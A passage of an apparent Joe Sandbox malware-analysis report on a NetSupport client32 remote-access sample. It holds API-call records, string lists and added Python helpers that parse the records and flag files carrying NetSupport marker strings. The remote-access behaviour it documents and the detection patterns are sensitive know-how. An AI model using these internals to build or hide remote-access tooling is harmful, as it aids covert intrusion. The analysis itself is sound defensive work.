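# Added triage helper for Joe Sandbox "APIs" lines. Not part of the report or
# the sample. Constant tables are the documented Win32 values, assumed to apply
# to this 32-bit sample.
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
WIN32_ERROR = {120: "ERROR_CALL_NOT_IMPLEMENTED"}  # 0x78: set by the stub when a GetProcAddress lookup fails

# "Name.MODULE(arg,arg,...), ref: ADDR"  or  "Name.MODULE ref: ADDR" (no arguments captured)
API_LINE = re.compile(r"(\w+)\.(\w+)(?:\((.*?)\))?,?\s*ref:\s*([0-9A-Fa-f]+)")


def parse_api_line(line):
    """Parse one report line into api/module/args/ref; None if it is not an API line."""
    m = API_LINE.search(line)
    if not m:
        return None
    name, module, raw_args, ref = m.groups()
    args = []
    for a in (raw_args.split(",") if raw_args is not None else []):
        a = a.strip()
        if a in ("", "?"):            # the report prints "?" for values it did not capture
            args.append(None)
            continue
        try:
            args.append(int(a, 16))   # caveat: an export name made only of hex digits would parse as a number
        except ValueError:
            args.append(a)            # string literal such as a DLL or export name
    return {"api": name, "module": module, "args": args, "ref": int(ref, 16),
            "subcall": "Part of subcall function" in line}


def _arg(call, i):
    return call["args"][i] if len(call["args"]) > i else None


def describe_connect(call):
    """Decode InternetConnectA(hInternet, server, port, user, password, service, flags, context)."""
    if call["api"] != "InternetConnectA" or len(call["args"]) < 6:
        return None
    return {
        "port": _arg(call, 2),
        "service": INTERNET_SERVICE.get(_arg(call, 5), _arg(call, 5)),
        "credentials": bool(_arg(call, 3)) or bool(_arg(call, 4)),  # non-NULL user or password pointer
    }


def summarize(lines):
    """Dynamic-import picture of one function record: DLLs loaded, exports resolved, errors set."""
    calls = [c for c in map(parse_api_line, lines) if c and not c["subcall"]]
    loaded = [_arg(c, 0) for c in calls if c["api"] == "LoadLibraryA" and isinstance(_arg(c, 0), str)]
    resolved = [_arg(c, 1) for c in calls if c["api"] == "GetProcAddress" and isinstance(_arg(c, 1), str)]
    errors = sorted({_arg(c, 0) for c in calls if c["api"] == "SetLastError" and isinstance(_arg(c, 0), int)})
    connect = next((describe_connect(c) for c in calls if c["api"] == "InternetConnectA"), None)
    return {
        "loaded": loaded,
        "resolved": resolved,
        "last_errors": [WIN32_ERROR.get(e, hex(e)) for e in errors],
        "connect": connect,
        "frees_library": any(c["api"] == "FreeLibrary" for c in calls),
    }


# Input lines copied from the two function records in the report above.
WININET_RECORD = """
• LoadLibraryA.KERNEL32(WinInet.dll,1B492F88,74DF23A0,?,00000000), ref: 110295C5
• GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102965F
• SetLastError.KERNEL32(00000078), ref: 11029673
• _malloc.LIBCMT ref: 11029697
• GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102973B
• InternetOpenA.WININET(11194244,?,?,000000FF,00000000), ref: 1102975A
  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
• GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029831
• InternetConnectA.WININET(000000FF,11199690,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102984E
• GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110298A9
• GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110298FD
• GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029A63
• FreeLibrary.KERNEL32(?), ref: 11029BAA
""".strip().splitlines()

DBGHELP_RECORD = """
• LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11143605
• LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11143614
• GetModuleHandleA.KERNEL32(?), ref: 1114361A
• GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11143679
• GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114369A
• GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111436DC
""".strip().splitlines()

if __name__ == "__main__":
    for name, record in (("WinInet", WININET_RECORD), ("DBGHELP", DBGHELP_RECORD)):
        print(name, summarize(record))
```

Subcall lines are dropped from the summary because they belong to callee functions, not to the record being characterised. The InternetConnectA decode for the WinInet record gives port 80 over INTERNET_SERVICE_HTTP with NULL user and password pointers, consistent with the "GET" and "://" strings in the same record.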

Control-flow Graph
• Function at 11139090 (graph rendered as an image in the report; edge list omitted). Entry block 11139090-111390c5 with an early GetCurrentThreadId branch; the body branches through IsWindow/IsWindowVisible checks, GetForegroundWindow with paired EnableWindow and SetForegroundWindow calls, FindWindowA (Shell_TrayWnd) and IsIconic, two GetLastError sites, two GetTickCount sites, the subcall at 11025bb0 that loads Wtsapi32.dll, and FreeLibrary, returning through 1113975a-11139775.
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 111390C7
                                                                                        • IsWindow.USER32(0002043C), ref: 11139125
                                                                                        • IsWindowVisible.USER32(0002043C), ref: 11139133
                                                                                        • IsWindowVisible.USER32(0002043C), ref: 1113916B
                                                                                        • GetForegroundWindow.USER32 ref: 11139186
                                                                                        • EnableWindow.USER32(0002043C,00000000), ref: 111391A0
                                                                                        • EnableWindow.USER32(0002043C,00000001), ref: 111391BC
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 111391CB
                                                                                        • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11139209
                                                                                        • IsWindowVisible.USER32(00000000), ref: 11139218
                                                                                        • IsWindowVisible.USER32(0002043C), ref: 11139248
                                                                                        • IsIconic.USER32(0002043C), ref: 11139255
                                                                                        • GetForegroundWindow.USER32 ref: 1113925F
                                                                                          • Part of subcall function 11131210: ShowWindow.USER32(0002043C,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                          • Part of subcall function 11131210: ShowWindow.USER32(0002043C,11139062,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131246
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 11139285
                                                                                        • EnableWindow.USER32(0002043C,00000001), ref: 11139294
                                                                                        • GetLastError.KERNEL32 ref: 11139353
                                                                                        • GetLastError.KERNEL32 ref: 111393CB
                                                                                        • GetTickCount.KERNEL32 ref: 11139678
                                                                                        • GetTickCount.KERNEL32 ref: 11139699
                                                                                          • Part of subcall function 11025BB0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,111396E2), ref: 11025BB8
                                                                                        • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 11139734
                                                                                        Strings
                                                                                         Memory Dump Source
                                                                                         • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                         • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                        • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                        • API String ID: 2511061093-2542869446
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 11115BC5
                                                                                        • CoCreateInstance.OLE32(111C081C,00000000,00000001,111C082C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104BADF), ref: 11115BDF
                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11115C04
                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11115C16
                                                                                        • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11115C29
                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11115C35
                                                                                        • CoUninitialize.COMBASE(00000000), ref: 11115CD1
                                                                                        Strings
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                        • String ID: SHELL32.DLL$SHGetSettings
                                                                                        • API String ID: 4195908086-2348320231
                                                                                        APIs
                                                                                        Strings
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _memset
                                                                                        • String ID: NBCTL32.DLL$_License$serial_no
                                                                                        • API String ID: 2102423945-35127696
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(1102E480,?,00000000), ref: 110310E4
                                                                                        Strings
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID: Client32$NSMWClass$NSMWClass
                                                                                        • API String ID: 3192549508-611217420
                                                                                        APIs
                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00B5F810,00B5F810,00B5F810,00B5F810,00B5F810,00B5F810,00B5F810,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                        • EqualSid.ADVAPI32(?,00B5F810,?,00000001,00000001), ref: 1109E9A3
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InformationToken$AllocateEqualInitialize
                                                                                        • String ID:
                                                                                        • API String ID: 1878589025-0
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,1B492F88,00080000,00000000,00000000), ref: 1109D46D
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                        • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                        • String ID:
                                                                                        • API String ID: 2349140579-0
                                                                                        APIs
                                                                                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109E810,00000244,cant create events), ref: 1109D4EC
                                                                                        • CloseHandle.KERNEL32(?,00000000,1109E810,00000244,cant create events), ref: 1109D4F5
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                        • String ID:
                                                                                        • API String ID: 81990902-0
                                                                                        • Opcode ID: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                        • Instruction ID: ae8e9f792a84aceb39bcb46fd7c9804e810fa9328d8f27f892a8d401e6504800
                                                                                        • Opcode Fuzzy Hash: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                        • Instruction Fuzzy Hash: 55E0EC71654614ABE738CF28DC95FA677ECAF09B01F11495DF9A6D6180CA60F8408B64
                                                                                        APIs
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • GetSystemMetrics.USER32(00002000), ref: 1102E7C4
                                                                                        • FindWindowA.USER32(NSMWClass,00000000), ref: 1102E985
                                                                                          • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                          • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                          • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                          • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                          • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102E9C1
                                                                                        • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102E9E9
                                                                                        • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102ECAB
                                                                                          • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B4C
                                                                                          • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B59
                                                                                          • Part of subcall function 11094B30: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B89
                                                                                        • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EA48
                                                                                        • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EA54
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1102EA6C
                                                                                        • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EA79
                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EA9B
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E7F6
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        • LoadIconA.USER32(11000000,000004C1), ref: 1102EE45
                                                                                        • LoadIconA.USER32(11000000,000004C2), ref: 1102EE55
                                                                                        • DestroyCursor.USER32(00000000), ref: 1102EE7E
                                                                                        • DestroyCursor.USER32(00000000), ref: 1102EE92
                                                                                        • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F45F
                                                                                        • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F4B2
                                                                                        • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 1102FA52
                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FA8C
                                                                                          • Part of subcall function 11132BF0: wsprintfA.USER32 ref: 11132C60
                                                                                          • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132C91
                                                                                          • Part of subcall function 11132BF0: SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                          • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132CAC
                                                                                          • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • DispatchMessageA.USER32(?), ref: 1102FA96
                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FAA8
                                                                                        • CloseHandle.KERNEL32(00000000,11027270,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102FD40
                                                                                        • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102FD78
                                                                                        • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 1102FD7F
                                                                                        • SetWindowPos.USER32(0002043C,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102FDB5
                                                                                        • CloseHandle.KERNEL32(00000000,11059C10,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102FE36
                                                                                        • wsprintfA.USER32 ref: 1102FFA5
                                                                                        • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 110300F7
                                                                                        • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103010D
                                                                                        • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 11030136
                                                                                        • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103015F
                                                                                          • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,1B492F88,00000002,74DF2EE0), ref: 1112820A
                                                                                          • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11128217
                                                                                          • Part of subcall function 111281B0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000), ref: 1112825E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$Process$Window$CloseCreateEventHandlePostwsprintf$CriticalOpenSectionThread$CountCurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTickTokenVersionWait$ClassDispatchEnterErrorExitFolderLastMetricsPathPrioritySendSleepSystem__wcstoi64_malloc_memset
                                                                                        • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$016477$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.8$V12.10.8$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                        • API String ID: 1099283604-1382196521
                                                                                        • Opcode ID: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                        • Instruction ID: 27af1d42f1b4f6ddb2c14770db7fbacfca67435089f052a3aa779117de4136e9
                                                                                        • Opcode Fuzzy Hash: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                        • Instruction Fuzzy Hash: 3CE25D75F0022AABEF15DBE4DC80FADF7A5AB4474CF904068E925AB3C4D770A944CB52

Control-flow Graph (rendered graph omitted; the block/edge list is not reproduced here)

• Executed
• Not Executed
• Function entry block: 1102db00; API calls appearing in the graph: GetComputerNameA, LoadLibraryA, GetProcAddress, SetLastError, FreeLibrary, GetCurrentProcessId, wsprintfA, CharUpperA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _malloc_memsetwsprintf
                                                                                        • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$016477$14/03/16 10:38:31 V12.10F8$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                        • API String ID: 3802068140-3876049245
                                                                                        • Opcode ID: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                        • Instruction ID: 727bed6a5d63171c4319a8bac454151215a042d106ed124055d9f0508de139ba
                                                                                        • Opcode Fuzzy Hash: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                        • Instruction Fuzzy Hash: 7932D275D0022A9FDF12DFA4DC84BEDB7B8AB44308F9445E9E55867280EB70AF84CB51
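The String ID lists of the two functions above (NSMWClass / NSMWControl32 / NSM.LIC / client32 in the first, client32.ini / NSM.LIC / the e:\nsmsrc\...\NSMString.h build path / V12.10F8 in the second) are the artifacts an analyst would pull out of this report as NetSupport client32 markers. The following triage helper is an added example, not part of the Joe Sandbox report and not NetSupport code: it scans a file for exactly those strings, grouped into categories of my own choosing, and calls the file "likely NetSupport" when at least three groups hit (the threshold and the grouping are assumptions, not anything the report states). The sample bytes at the bottom are constructed for the demonstration.

```python
"""Added triage helper (not from the Joe Sandbox report): look for the
NetSupport client32 marker strings that the report lists under String ID."""
import re
from typing import Dict, List

# Marker strings copied from the report's String ID lists.
# The grouping into categories is my own (assumption), chosen so that one
# accidental substring hit cannot by itself tip the verdict.
NETSUPPORT_MARKERS: Dict[str, List[bytes]] = {
    "window_class": [b"NSMWClass", b"NSMWClassVista", b"Global\\NSMWClassAdmin"],
    "ipc_window":   [b"NSMWControl32", b"NSSWControl32", b"NSTWControl32"],
    "config_files": [b"client32.ini", b"NSM.LIC", b"NSA.LIC"],
    "build_path":   [b"e:\\nsmsrc\\nsm\\1210\\1210f\\ctl32\\NSMString.h", b"CLIENT32.CPP"],
    "ini_keys":     [b"*ListenPort", b"*ScreenScrape", b"*StartupDelay",
                     b"DisableConsoleClient", b"UseIPC"],
}

# Version tokens seen in the report: V12.00.8, V12.10.8 and the build stamp V12.10F8.
VERSION_RE = re.compile(rb"V12\.\d{2}[.F]\d")


def scan_for_netsupport(data: bytes, min_groups: int = 3) -> dict:
    """Return which marker groups hit, any version tokens, and a verdict.

    min_groups is an assumed threshold: require hits in at least this many
    independent groups before flagging the file.
    """
    hits = {group: [m.decode() for m in markers if m in data]
            for group, markers in NETSUPPORT_MARKERS.items()}
    versions = sorted({v.decode() for v in VERSION_RE.findall(data)})
    groups_hit = sum(1 for found in hits.values() if found)
    return {
        "hits": hits,
        "versions": versions,
        "groups_hit": groups_hit,
        "likely_netsupport": groups_hit >= min_groups,
    }


def scan_file(path: str, min_groups: int = 3) -> dict:
    """Convenience wrapper: scan a file on disk (e.g. a dropped client32.exe)."""
    with open(path, "rb") as fh:
        return scan_for_netsupport(fh.read(), min_groups)


# Constructed sample input: a handful of the report's strings with NUL padding,
# as they would sit in a PE .rdata section. Not real sample bytes.
SAMPLE = (b"\x00" * 16
          + b"NSMWClass\x00client32.ini\x00V12.10.8\x00"
          + b"e:\\nsmsrc\\nsm\\1210\\1210f\\ctl32\\NSMString.h\x00*ListenPort\x00")
# Constructed benign input with none of the markers.
BENIGN = b"MZ\x90\x00 hello world, nothing of interest here"

if __name__ == "__main__":
    for name, blob in (("constructed sample", SAMPLE), ("benign", BENIGN)):
        result = scan_for_netsupport(blob)
        print(f"{name}: groups_hit={result['groups_hit']} "
              f"versions={result['versions']} likely={result['likely_netsupport']}")
```

Run it against the dropped file from this report with `scan_file(path)`; the verdict is deliberately conservative, since single strings such as `Client` or `TCPIP` also occur in benign software, which is why only the distinctive markers are listed and a multi-group threshold is used.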

Control-flow Graph (rendered graph omitted; the block/edge list is not reproduced here)

• Executed
• Not Executed
• Function entry block: 110a9c90; API calls appearing in the graph: LoadLibraryA, GetProcAddress, SetupDiGetClassDevsA, SetupDiDestroyDeviceInfoList, CreateFileA, GetLastError, SetLastError, FreeLibrary, _malloc, _free
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(setupapi.dll,1B492F88,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11184778), ref: 110A9CC3
                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A9CE7
                                                                                        • SetupDiGetClassDevsA.SETUPAPI(111A6E0C,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF), ref: 110A9D01
                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A9D2C
                                                                                        • _free.LIBCMT ref: 110A9D60
                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9D72
